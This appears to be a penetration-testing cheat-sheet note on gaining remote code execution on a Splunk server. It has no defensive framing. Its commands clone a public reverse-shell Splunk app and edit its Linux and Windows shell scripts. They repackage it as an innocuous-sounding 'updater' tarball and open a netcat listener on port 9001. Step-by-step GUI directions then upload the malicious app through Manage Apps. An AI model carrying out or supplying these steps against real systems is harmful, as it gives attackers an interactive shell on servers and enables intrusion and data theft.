RCE#

Create a malicious splunk app to upload

git clone https://github.com/0xjpuff/reverse_shell_splunk.git
mkdir updater
cp -r reverse_shell_splunk/reverse_shell_splunk/bin reverse_shell_splunk/reverse_shell_splunk/default ./updater
# Edit this revshell script if the target is linux
vim ./updater/bin/rev.py
# Edit the .ps1 if the target is windows
vim ./updater/bin/run.ps1
tar -czvf updater.tar.gz updater

nc -nvlp 9001

Navigate gui to upload app#

On home page, click on Splunk Apps

Then on top “kinda” left, Apps -> Manage Apps

Finally, Install app from file and upload your own malicious tarball